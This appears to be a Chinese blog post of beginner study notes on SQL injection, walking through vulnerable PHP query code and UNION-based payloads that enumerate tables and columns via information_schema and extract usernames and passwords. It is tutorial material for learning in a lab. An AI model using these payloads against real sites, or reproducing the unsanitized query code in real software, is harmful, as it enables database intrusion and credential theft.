sql注入学习笔记第一章节———基本sql原理讲解以及基础初利用

已于 2022-10-19 08:38:34 修改
阅读量182 收藏
点赞数
文章标签: 数据库 sql mysql
于 2022-09-28 01:02:10 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_61948493/article/details/127081440
版权

一.sql注入原理

 

原理代码:

if(isset($_GET['id']))
{
$id=$_GET['id'];
//logging the connection parameters to a file for analysis.
$fp=fopen('result.txt','a');
fwrite($fp,'ID:'.$id."\n");
fclose($fp);

// connectivity 


$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

1.获得数据

2.凭借语句

3.数据库执行

4.页面显示结果

注入,就是注入sql语句,利用网页的参数传递功能,将我们想要执行的功能转化为sql语句后拼接到源语句上,实现sql注入

例如:

原语句:
SELECT * from users where id=”参数位置“ LIMIT 0,1
​
拼接后:
SELECT * from users where id=-2 union select 1,emali_id,3 from emails LIMIT 0,1

可以看出,正常情况下id的值为1,2,3......,但经认为凭借后变成了后者,产生注入(这里的id=-2是为了让union前的语句失效,只执行后面的语句)

注入条件

1.需要可控变量输入

2.可拼接的语句

3.要有数据库查询的函数

4.没有过滤或者可绕过过滤

二、数据库结构(mysql)

数据库a=网站a=数据库用户a

表名

       列名

              数据

数据库b=网站b=数据库用户b

.......................

数据库c=网站c=数据库用户c

........................

所以注入时要一步一步的获得

三、如何判断注入点

老方法:

id =1 and 1=1 页面正常

and 1=2 页面错误

新方法:

id=1hdsajkhdajs

在变量哪里乱输入,看看你有没有影响

有些时候会报错——网站有检测——没有漏洞

四、联合注入——union

1.判断注入(上述)

2.信息搜集

数据库版本——version()

数据库名字——datebase()

数据库用户——user()

操作系统@@version_compile_os

注:1在mysql5.0以上的版本中有一个自带的数据库:information_schema,里面有记录所有的数据库名,表名,列名,所以也可以通过该数据库查询相关的数据库名,表名,列名

2.数据库中符号“.”代表下一级的意思,如:xxx.user就代表xxx数据库下名为user的表

所以:

information_schema.tables——记录所有表名信息的表

information_schema.columns——记录所有列名信息的表

table_name——表名

columns_name——列名

3.拆解列名数量——union注入前后两条语句字段数相同,不然报错

order by 1
order by 2
order by 3

4.报错—— id = -2

SELECT * from users where id=-2 union select 1,2,3

5.查询指定数据库下面表明的信息

SELECT * from users where id=-2 union select 1,table_name,3 form information_schema.table where table_schema='xxx'
​
SELECT * from users where id=-2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='xxx'
​
​
group_concat(table_name)——查询所有。横向展开

6.查询指定表下面列名的信息

SELECT * from users where id=-2 union select 1,group_concat(columns_name),3 form information_schema.columns where table_name='xxx'

7.查询指定数据

SELECT * from users where id=-2 union select 1,username,password form xxx

8.拆解多个数据:limit x.1

用法:【select * from tableName limit i,n 】

参数:

  • tableName : 为数据表;

  • i : 为查询结果的索引值(默认从0开始);

  • n : 为查询结果返回的数量

 

b1ack1ce0x00
关注
SQL注入漏洞复现:探索不同类型的注入攻击方法
weixin_43263566的博客
08-26 1439
基于错误的注入(Error-based Injection):攻击者通过构造恶意的SQL语句,利用应用程序返回的错误信息来获取数据库中的敏感信息。基于联合查询的注入(Union-based Injection):攻击者通过在注入点处构造特殊的SQL语句,利用UNION命令将其他查询结果合并到原始查询中,从而获取额外的数据。基于时间延迟的注入(Time-based Injection):攻击者通过在注入点处构造特殊的SQL语句,
[网络安全自学篇] 六十.Cracer第八期——(2)五万字总结Linux基础知识和常用渗透命令
热门推荐
杨秀璋的专栏
03-19 1万+
作为Web渗透的学者,Linux基础知识和常用命令是我们的必备技能,本文详细讲解了Linux相关知识点及Web渗透免了高龄。如果想玩好Kali或渗透,你需要学好Linux及相关命令,以及端口扫描、漏洞利用、瑞士军刀等工具。安全领域通常分为网络安全(Web渗透)和系统安全(PWN逆向)两个方向。非常基础的一篇文章,希望能够帮助到您!
SQL注入学习笔记
星落
11-04 1147
SQL 注入就是指 web应用程序对用户输入的数据合法性没有过滤或者是判断,前端传入的参数是攻击者可以控制,并且参数带入数据库的查询,攻击者可以通过构造恶意的 sql语句来实现对数据库的任意操作;即通过把sql命令插入到Web表单提交或输入域名或页面请求的查询字符串中,最终欺骗服务器执行恶意的SQL命令
1+X 网络安全运营平台与管理 sql注入实验报告
路baby的博客
11-18 2254
项目化考核 1+X 证书(网络安全运营平台管理) sql注入实验报告 实验目的:实验设备 (环境)实验要求:实验原理:实验步骤:实验总结:
第12天:WEB漏洞-SQL注入之简要SQL注入
cailme的博客
04-24 159
渗透测试day12
第一部分:1.MySQL数据库基础知识
→_→
03-10 1746
SQL注入学习之路专栏,里面的内容是基于Sqli-labs这个环境来进行学习的,从原理一步一步来学习。(我在window Sever 2003虚拟机中通过phpstudy 2016搭建了Sqli-labs环境。) 下面开始我们的学习之旅: 1.启动 mysql,然后通过查询检查下数据库: show databases; 2. Sqli-labs环境中使用的数据库名为 s...
信息安全web安全学习04
June_Wosen的博客
01-18 2779
信息安全web安全学习04
学习笔记——spring5概念和原理
fangfeng1021的博客
05-27 328
文章目录一、 spring5概述和原理Spring5 框架概述Spring5入门案例IOC(概念和原理)IOC(BeanFactory 接口)IOC操作 Bean 管理(概念)IOC操作 Bean 管理(基于 xml 方式)IOC操作 Bean 管理( xml 注入其他类型属性)IOC 操作 Bean 管理(xml 注入集合属性)IOC操作 Bean 管理( FactoryBean)IOC操作 Bean 管理( bean 作用域)IOC操作 Bean 管理( bean 生命周期)IOC操作 Bean 管理(
spring security——基本介绍(一)
m0_68850571的博客
04-10 2593
一、spring security 简介 spring security 的核心功能主要包括: 认证 (你是谁) 授权 (你能干什么) 攻击防护 (防止伪造身份) 其核心就是一组过滤器链,项目启动后将会自动配置。最核心的就是 Basic Authentication Filter 用来认证用户的身份,一个在spring security中一种过滤器处理一种认证方式。 比如,对于username password认证过滤器来说, 会检查是否是一个登录请求; 是否包含username
MyBatis第三天学习笔记——常用注解及参数解释
抛弃幻想,准备斗争
04-06 680
MyBatis注解方式就是将SQL语句直接写在接口上。可以用在需求比较简单的系统,当SQL有变化时都需要重新编译代码,一般不用注解。 使用mapUnderscoreToCamelCase配置 MyBatis3.3.1版本开始,@Results注解增加了一个id属性,设置id属性后,就可以通过id属性引用同一个@Results配置了。 使用resultMap方式@Insert注解 不需要返...
数据库手工注入中的闭合
菜鸟-传奇
08-21 1319
1、什么是闭合? 闭合:这个语句可以完整正确的执行 后台服务器PHP代码: $sql = "SELECT * FROM users WHERE id = $id LIMIT 0,1"; $sql = "SELECT * FROM users WHERE id = '$id' LIMIT 0,1"; $sql = "SELECT * FROM users...
SQL注入之简要注入(学习笔记
qq_19375535的博客
07-01 174
sql注入学习
tp5.1 where原生查询多条件where("tp.id='".$id."' and tp.deleted=0")
php菜鸟技术天地
11-05 7292
->where("tp.id='".$id."' and tp.deleted=0") 字符串条件查询 对于一些实在复杂的查询,也可以直接使用原生SQL语句进行查询,例如: Db::table('think_user') ->where('id > 0 AND name LIKE "thinkphp%"') ->select(); 为了安全起见...
SQL 手工注入
枫梓林のBlog
04-25 1万+
SQL 手工注入 文章目录SQL 手工注入0x01 SQL注入概述0x02 SQL 注入原理1.基本概述2.单引号的作用3.SQL 注入流程4.SQL 注入的基本分类3.常见注入方式分类0x03 部署 sqli-labs 学习环境1.sqli-labs 简介2.部署sqli-labs 实验环境2.1 搭建LAMP 环境2.2 检查安装的状态和启动服务2.3 配置 mysq 数据库 root 用户密码2.4 安装 sqli-labs 教学环境2.5 创建快照0x04 安装 hackbar 插件0x05 SQL
CTF 中的 SQL 注入总结
重新启程
10-12 4891
flag 常见表 1 select flag from flag SQL 注入的基本原理 1 2 3 select * from user where username='' and pass='' # 构造 username=devnull' or '1后,sql 语句变成 select * from us...
现场分析sql注入
doudoudedi
07-17 407
select * from users where id=’$id’ LIMIT 0,1 这个是pho代码 查询所有的东西前提是id=id还有0到1行 我们加入一个单引号 select * from users where id=‘1’’ limit 0,1 多出了一个单引号我们就会想到注释后面的单引号(注释符可以用%23,–+等) 2个单引号中间的空白也就成了一个可以执行sql代码的空间我们就可...
Sqli-labs 查看源代码 1-20
foolisheddy
03-08 4939
Less-1 indexphp sqli-connectphp db-credsinc GET - 基于错误 - 单引号 - 字符型 Less-2 GET - 基于错误 - 整型 Less-3 基于错误 - 单引号变形 - 字符型 Less-4 基于错误 -双引号- 字符型 Less-5 Less-6 双注入-双引号-字符型 Less-7 单引号 双括号 非基于错误 Less-8 基于布尔 - 单引
PyQt 的Tree Widget中拖放和点击的异常行为
weixin_44617651的博客
10-10 475
在 PyQt 的 ​​QTreeWidget​​ 中,如果你遇到 拖放 和 点击 的异常行为,可能是由于信号处理、事件拦截、拖放设置或树结构配置等问题导致的。以下是一些可能的常见问题和解决方案。
MySQL数据库的详细学习步骤
最新发布
2401_87352036的博客
10-11 1129
MySQL数据库的详细学习步骤可以归纳为以下几个阶段,每个阶段都包含了特定的学习内容和目标。
SQL注入基础学习:从神话到数据库原理
"这篇资料主要介绍了SQL注入基础知识,包括数据库基础概念、SQL注入漏洞的形成、其在渗透测试中的作用以及常见的SQL注入过程。通过一个寓言故事引入,激发学习兴趣,然后深入讲解相关技术点。" 在IT安全领域,SQL...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值